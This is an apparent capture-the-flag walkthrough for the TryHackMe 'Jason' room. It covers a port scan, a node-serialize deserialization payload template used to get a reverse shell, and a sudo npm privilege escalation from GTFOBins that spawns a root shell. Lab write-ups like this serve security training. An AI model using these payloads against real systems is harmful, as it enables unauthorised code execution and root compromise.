TryHackMe Jason
We are Horror LLC TryHackMe Jason, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!
In JavaScript everything is a terrible mistake.
Thanks to @Luma for testing the room.

Scan the machine
rustscan -a 10.10.44.51

Investigate Web server
firefox http://10.10.44.51

Analise Source Code

Investigate Requests

10.10.82.11
Get a reverse Shell

{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}



Get User Flag
cat /home/dylan/user.txt

Escalate Privileges

Search for npm on GTFO Bins and we have

export TERM=xterm
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i

Get Root Flag
cat /root/root.txt
